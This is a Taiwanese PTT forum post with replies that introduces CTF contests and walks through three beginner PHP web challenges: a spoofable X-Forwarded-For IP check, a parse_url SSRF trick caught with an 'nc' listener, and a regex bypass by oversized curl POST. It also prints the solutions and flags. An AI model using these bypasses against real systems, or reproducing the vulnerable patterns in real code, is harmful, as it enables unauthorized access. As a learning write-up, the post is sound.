[徵文] CTF (Cature The Flag)

時間Wed Apr 1 23:18:12 2020

CTF (Cature The Flag) 起源於1996年 Global Hacking Conference 是較量網路安全知識與能力的競賽 CTF 涉及的領域與知識繁多, 隨著資安技術發展的加速題目也越來越難, 入門門檻越來越高雖然沒有參賽過, 但有幸聽過有經驗的參賽者分享才知道台灣這方面挺強的, 也了解到相關知識不但有趣而且重要在這邊記錄講者提供的3個體驗題目與解題資訊目標: cature the flag, 也就是要想辦法取得 flag 的值假設題目放在 10.20.104.3 這台機器 [Q1] yoyoadmin <?php highlight_file(__FILE__); //get ip $ip = 'unknown'; if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } else if ( !empty($_SERVER['HTTP_X_FORWARDED_FOR']) ) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip = $_SERVER['REMOTE_ADDR']; } if ($ip === '127.0.0.1') { require_once 'flag.php'; echo $flag; } else { echo 'hi normal user'; } ?> [Q2] test connection <?php highlight_file(__FILE__); $url = isset($_POST['url']) ? $_POST['url'] : ""; if ($url != "" ) { $pu = parse_url($url); if (isset($pu["host"]) && isset($pu["scheme"])) { if ($pu["host"] === "10.20.104.1" && ($pu["scheme"] === "http" || $pu["scheme"] === "https") ) { require("flag.php"); exec("curl --insecure -H 'User-Agent: $flag' " . escapeshellarg($url), $output); echo 'connected!<br>'; } else{ echo 'error host! please set 10.20.104.1 <br>' . PHP_EOL; } } else{ echo 'no host/scheme! <br>'.PHP_EOL; } } echo 'Please give me an url: <form method="POST"> <input type="text" ' . 'name="url"> <input type="submit" value="Submit"> <br>' . PHP_EOL; // The flag is in User-Agent. Try to connect back to you :) [Q3] pregg <?php highlight_file(__FILE__); if (isset($_POST['product']) && is_string($_POST['product'])) { if (without($_POST['product'])) { if (need($_POST['product'])) { require 'flag.php'; print $flag; } else{ print '<br> <br> We want Ptt and SoftJob.'; } } } function without($product) { if (preg_match('#^.*((?:Ptt)|(?:SoftJob)).*$#s', $product, $m) === 1) { print "<br> <br> It shouldn't be Ptt or SoftJob."; return false; } else { return true; } } function need($product) { return strpos($product, 'Ptt') !== false && strpos($product, 'SoftJob') !== false; } ?> ======================================================== [A1] solution 1: 用工具 (e.g. Burp Suite) 竄改 HTTP request header ref. https://devco.re/blog/2014/06/19/client-ip-detection/ solution 2: 直接連沒擋 access 的 https://10.20.104.3/yoyoadmin/flag.php FLAG{Y0u_4r3_lOca1ho5ting!} [A2] ref. https://0day.work/ekoparty-ctf-2016-writeups/#web200 solution: http://10.20.0.241:8080#@10.20.104.1/ 或 http://10.20.0.241:[email protected]/ 接著跑 nc -lp 8080 // 延伸閱讀 http://www.tecmint.com/check-remote-port-in-linux/ FLAG{php_par5e_url_so_co0oOoo1~~} [A3] // 有些環境條件當時忘了記錄, 例如PHP版本要是5.x 在這邊查到題目來源 http://www.wechall.net/cs/challenge/noother/preg_evasion/index.php?source=show 當時看的ref. 現在已經連不上了: http://www.bommachine.co.uk/xss-php-regex-and-pcre-library-fail/ solution: 產生一個名為body的檔案, 內容為 product=PttSoftJobxxx...x // 一共199995個x 接著跑 curl -k https://10.20.104.3/pregg/index.php -XPOST -d "@body" FLAG{Ptt5oftJobJ0bJQb} 希望能讓更多人接觸到CTF 稍微投入點時間, 就會發現它的有趣與魅力 --

※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 111.249.17.140 (臺灣) ※ 文章網址: https://webptt.com/m.aspx?n=bbs/Soft_Job/M.1585754320.A.9CD.html ※ 編輯: oscarchichun (111.249.17.140 臺灣), 04/01/2020 23:49:22

1^F：推 kaizz: 有修過打CTF的課真的很有趣！ 04/02 04:33

2^F：推 alan23273850: 推！所以第一個工具就可以偽裝自己 ip 了嗎 04/02 09:16

3^F：→ Masakiad: 樓上，這麼說並不正確，因為正常狀況IP應該是拆layer3 04/02 11:31

4^F：→ Masakiad: 資料出來校對，只有php才有可能這麼蝦，去拆layer7的htt 04/02 11:31

5^F：→ Masakiad: p header來校對。原文也說了是修改header而不是ip 04/02 11:31

6^F：推 splitline: 跟php沒關係，純粹是開發者的問題 04/02 11:35

7^F：→ Masakiad: 我沒有要貶低php語言本身，但php的開發者才容易真的寫出 04/02 11:48

8^F：→ Masakiad: 這題目1這種弱點的系統。 04/02 11:48

9^F：→ w181496: 回樓上我在很多go, nodejs等正式上線專案也看過一樣的 04/02 13:05

10^F：→ w181496: 錯誤抓ip方式，跟語言無關，純粹是開發者觀念錯誤 04/02 13:05

11^F：推 Masakiad: 是開發者問題沒錯啊，但這些初學者這樣寫跟語言盛行時代 04/02 13:23

12^F：→ Masakiad: 已經網上錯誤文章數量有關。換言之我如果是攻擊者，看 04/02 13:23

13^F：→ Masakiad: 到php平台我可能會優先做這樣的嘗試，但其他語言就很後 04/02 13:23

14^F：→ Masakiad: 面甚至根本不用試 04/02 13:23

15^F：→ senjinbin56: 你知道XFF這種header在reverse proxy多層次架構是很 04/02 13:38

16^F：→ senjinbin56: 正常的實作方式嗎？ 04/02 13:38

17^F：→ senjinbin56: 用這個方法抓client ip在proxy架構下是沒有問題的。 04/02 13:38

18^F：→ senjinbin56: 但換個場景到一般應用，攻擊者如果可以直接修改XFF h 04/02 13:38

19^F：→ senjinbin56: eader的話，就會有問題了 04/02 13:38

20^F：→ senjinbin56: 所以就算是樓上講的php，只要場景應用正確，那這種寫 04/02 13:38

21^F：→ senjinbin56: 法其實也不一定會有問題 04/02 13:38

22^F：→ er230059: 直接抓IP Layer的IP在有PROXY的狀況也是有其他商業問題 04/02 15:02

23^F：→ Masakiad: 原文題目就沒出proxy了，而proxy帶xff就已經是穿過L3了 04/02 17:01

24^F：→ Masakiad: ，樓樓上應該是忘記了？ 04/02 17:01

25^F：推 pichubaby: 拆L3說出來大概一大堆人腦海OS我家L3拆出來192.168... 04/03 01:57

26^F：→ pichubaby: 事實上的問題是不太應該用IP作為安全性條件 04/03 01:58

27^F：→ pichubaby: 再來考慮下個問題是，Client端有同意讀取或是儲存IP嗎 04/03 01:59

28^F：→ pichubaby: 這個屬於個人資料保護法或是GDPR層面的問題 04/03 02:00

29^F：→ namecoin: Capture The Flag 04/03 20:27

感謝樓上提醒(Catch -> Capture), 這個typo可大了lol ※ 編輯: oscarchichun (36.229.55.163 臺灣), 04/04/2020 11:08:26

30^F：推 leo258x: 真的有趣 04/08 15:29

	[問題/行為] 貓晚上進房間會不會有憋尿問題
	Re: [閒聊] 選了錯誤的女孩成為魔法少女 XDDDDDDDDDD
	[正妹] 瑞典一張
	[心得] EMS高領長版毛衣.墨小樓MC1002
	[分享] 丹龍隔熱紙GE55+33+22
	[問題] 清洗洗衣機
	[尋物] 窗台下的空間
	[閒聊] 双極の女神1 木魔爵
	[售車] 新竹 1997 march 1297cc 白色四門
	[討論] 能從照片感受到攝影者心情嗎
	[狂賀] 賀賀賀賀賀！島村卯月！總選舉NO.1
	[難過] 羨慕白皮膚的女生
	閱讀文章
	[黑特]
	[問題] SBK S1安裝於安全帽位置
	[分享] 舊woo100絕版開箱!!
	Re: [無言] 關於小包衛生紙
	[開箱] E5-2683V3 RX480Strix 快睿C1 簡單測試
	[心得] 蒼の海賊龍地獄執行者16PT
	[售車] 1999年Virage iO 1.8EXi
	[心得] 挑戰33 LV10 獅子座pt solo
	[閒聊] 手把手教你不被桶之新手主購教學
	[分享] Civic Type R 量產版官方照無預警流出
	[售車] Golf 4 2.0 銀色自排
	[出售] Graco提籃汽座（有底座）2000元誠可議
	[問題] 請問補牙材質掉了還能再補嗎?(台中半年內
	[問題] 44th 單曲生寫竟然都給重複的啊啊！
	[心得] 華南紅卡/icash 核卡
	[問題] 拔牙矯正這樣正常嗎
	[贈送] 老莫高業初業 102年版
	[情報] 三大行動支付本季掀戰火
	[寶寶] 博客來Amos水蠟筆5/1特價五折
	Re: [心得] 新鮮人一些面試分享
	[心得] 蒼の海賊龍地獄麒麟25PT
	Re: [閒聊] (君の名は。雷慎入) 君名二創漫畫翻譯
	Re: [閒聊] OGN中場影片：失蹤人口局 (英文字幕)
	[問題] 台灣大哥大4G訊號差
	[出售] [全國]全新千尋侘草LED燈, 水草

WEB批踢踢(PTT)

Soft_Job 板

[徵文] CTF (Cature The Flag)

熱門看板

贊助商連結